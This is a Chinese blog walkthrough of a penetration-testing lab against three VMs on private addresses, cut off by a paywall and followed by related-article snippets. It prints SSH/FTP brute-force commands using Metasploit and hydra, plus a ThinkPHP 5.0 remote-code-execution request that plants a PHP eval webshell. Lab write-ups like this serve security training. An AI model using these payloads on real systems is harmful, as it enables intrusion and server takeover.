渗透测试实战 - 外网渗透内网穿透(超详细)

已于 2024-05-06 15:37:50 修改
阅读量8.9k 收藏 147
点赞数 17
分类专栏: 渗透测试实战教学 文章标签: linux 漏洞复现 安全 渗透测试 内网渗透测试
于 2023-02-18 01:51:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44971640/article/details/129096084
版权
本文详细介绍了如何进行渗透测试,从获取Centos7、Ubuntu和Windows7三台主机权限的角度出发,涉及信息收集、端口爆破、漏洞利用、内网穿透等环节。通过Thinkphp框架的命令执行漏洞、SQL注入、MS17-010漏洞等,最终成功拿到所有目标主机的权限,并建立了Socks代理进行内网穿透。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

实验环境

做到一半环境崩了,IP地址以下面为准

Target1 - Centos7 (web服务)

此主机的IP地址:
192.168.41.136 (模拟公网IP能与物理机通讯)
192.168.22.132

Target2 - Ubuntu (内网web服务)

此主机的IP地址:
192.168.22.133
192.168.33.130

Target3 - Windows7 (客户端)

此主机的IP地址:
192.168.33.33

实验目的

拿下三台主机权限

实验步骤

测试Target1

信息收集

使用dirsearch扫描192.168.41.136的网站目录,发现 http://192.168.41.136/index.php 是Thinkphp框架

nmap扫描端口

22/21端口 弱口令爆破(MSF,hydra)
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.41.136
set USER_FILE /root/Desktop/tools/dic_username_ssh.txt
set PASS_FILE /root/Desktop/tools/pwd100.txt

 hydra -L /home/kali/Desktop/sshfuzz/user.txt -P /home/kali/Desktop/sshfuzz/pass.txt 192.168.41.136 ssh -f

 hydra -L /home/kali/Desktop/sshfuzz/user.txt -P /home/kali/Desktop/sshfuzz/pass.txt 192.168.41.136 ftp -f
3306端口

不允许远程IP登录

8888端口

宝塔界面未知账号密码无法利用

80端口

Thinkphp v5.0 存在远程命令执行漏洞,通过命令执行写入一句话,可 GetShell

php一句话木马 poc

/index.php?
s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put
_contents&vars[1][]=admin123.php&vars[1][]=<?php @eval($_POST[123]);?>

使用蚁剑链接成功

web服务器成功拿下 (192.168.41.136)

主机信息收集

ifconfig 发现存在22网段

上传脚本到 /tmp目录 ,扫描22网段 ping.sh

#!/bin/bash
for num in {
   1..254};
  do
    ip=192.168.22.$num
    ping -c1 $ip >/dev/null
最低0.47元/天 解锁文章
渗透系列:外网渗透内网穿透超详细
weixin_54626591的博客
12-07 1100
外网渗透内网穿透超详细
内网渗透-实战|手把手教你如何进行内网渗透
lza20001103的博客
08-18 2019
实战|手把手教你如何进行内网渗透 x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一) 内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关
一次渗透测试的过程
min_xu的专栏
12-25 672
我们检测的三台主机中两台为Linux系统,一台为AIX系统。还有一台是边界路由器。 目标网络的主机通过地址转换来提供对外访问,内部使用172.16.*.*地址段(这些信息 是测试之后才得到的,开始并不知道)。在边界路由器后面还有一台Cisco PIX 525 (515?)对三台主机进行保护,只允许外部用户连接不同主机的部分端口,例如80, 25,110等等。 根据我们的检测,Cisco PIX
网络安全渗透实战学习
热门推荐
kali_Ma的博客
10-27 2万+
前言 本次渗透以SMB共享之SCF文件攻击为突破点,利用burp编码爆破Basic Authorization认证、smb连接的多种方法、windows用户的NTLM值破解方法、evil-winrm的运用、windows主机信息收集工具、msf运行powershell脚本、远程运行powershell脚本、PrintNightmare漏洞提权等多个知识点。 本次渗透过程从技术层面来说难度并不算很大,本文精华在于渗透过程中运用到了多个知识点,并对多种利用SMB攻击的方法作了总结,下面开始此次渗透实战之旅。 信
渗透测试真详细!以实战学习渗透测试流程及报告(图文+视频讲解)
最新发布
kjuhfkicf154的博客
05-05 1044
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
一次渗透测试实战
m0_46467017的博客
04-23 2万+
一次渗透测试实战前言信息收集漏洞验证漏洞攻击Grafana任意文件读取漏洞(CVE-2021-43798)一、漏洞描述二、漏洞影响范围Payload:ActiveMQ 任意文件上传漏洞(CVE-2016-3088)一、漏洞描述二、漏洞影响范围三、漏洞利用:写入webshell权限提升CVE-2021-4034 Linux polkit 提权漏洞一、漏洞描述二、影响版本三、漏洞利用总结 前言 学习了一两个月的安全,为了对自己的一个学习水平做一个总结,所以我特地找来一个网站来进行一次渗透实战。 信息收集 这次的
渗透测试实战分享—从app到网站沦陷
xx16755498979的博客
01-29 583
分享一下今天对某app进行渗透测试,从基础的信息收集到拿到网站的shell的过程。总体来是还是挺简单的,就是基础的渗透测试思路1. 使用模拟器挂上代理并对app进行抓包,我们把其域名给拿出来2. 使用工具对主域名进行敏感目录扫描,发现存在一个admin的目录对该目录进行访问,发现存在管理后台,且目前看没有验证码,可以尝试爆破输入不同的账号,看是否存在用户名枚举,如下输如admin显示账号或者密码错误输入admin2显示账号未注册,所以此处存在账号枚举漏洞3. 进行表单爆破。
渗透实战(提高你的实战能力)_渗透测试实战
jennycisp的博客
02-08 1532
一、靶机地址下载靶机后,双击用vmware打开。二、靶机渗透1、打开靶场显示的是一个登陆界面。2、看到这个界面,我们不知道账号和密码,先外网打点。使用kali中的端口扫描工具:nmap 判断这个靶场地址的ip地址3、发现存在80端口,我们去通过ip去访问web界面。4、查看一下端口详细信息5、没发现什么其他了。我们现在对它进行目录扫描,看看有没有什么特殊的东西。一个一个去看6、可以输入,尝试尝试。发现了这个,我们去看看txt文件。发现我的输入都被保存在txt文件中了。
渗透测试流程与内网渗透测试实战
悦分享
07-15 7957
关于免杀,我使用的全部是msf的编码自免杀,64位使用的是x64/zutto_dekiru,32位使用的是x86/shikata_ga_nai,360都没有拦截。虽然靶机中有360,但是我直接上传的mimikatz也没有被杀,所以我有些怀疑是360的版本比较低,除了web服务器上传的第一个payload,其它都进行了编码处理,而第一个也确实没有执行成功,这说明360至少对第一个payload是拦截了的。
内网渗透测试技术
09-13
本知识点将详细介绍内网渗透测试中的关键技术点和实践步骤,包括内网转发、信息收集、横向移动和收尾工程。 内网转发是指在渗透测试过程中,为了能够更深入地访问内网资源,需要建立一个从攻击者机器到目标内网的...
【网络安全知识体系】外网渗透测试 | 14个小实验
04-18 1万+
【通俗易懂】外网渗透测试的流程&14个小实验带你了解网络安全
渗透测试实验一 网络扫描与网络侦察
qq_50798384的博客
11-06 1135
一. 用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。 二、照片中的女生在哪里旅行?截图搜索到的地址信息 1.首先,再搜索引擎中输入图片中的关键信息cafe brasserie letrentehuit 2.找到店的门牌号为38 avenue de Suffren,75015 Paris, ,France,发现这家店位于巴黎 3.在谷歌地球中输入门牌号,即得到街景信息 4.在百度地图中输入门牌号38 avenue d
渗透测试实战
weixin_45803006的博客
05-02 2324
下载kali,kali上有很多做渗透测试的驱动,该软件在kali中就有。
渗透测试综合实验(迂回渗透,入侵企业内网并将其控制为僵尸网络)
yyj1781572的博客
04-06 2097
内网渗透测试
渗透测试实战-bulldog
qq_46540840的博客
01-28 6173
环境准备 kali 当成攻击机 bulldog靶机 官网下载地址 Vmware装入即可,成功后是显示这个样子 kali ip 是:192.168.240.128 信息收集 使用nmap List item 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impor
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试小白

如果您觉得满意,一分一毛也是爱

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值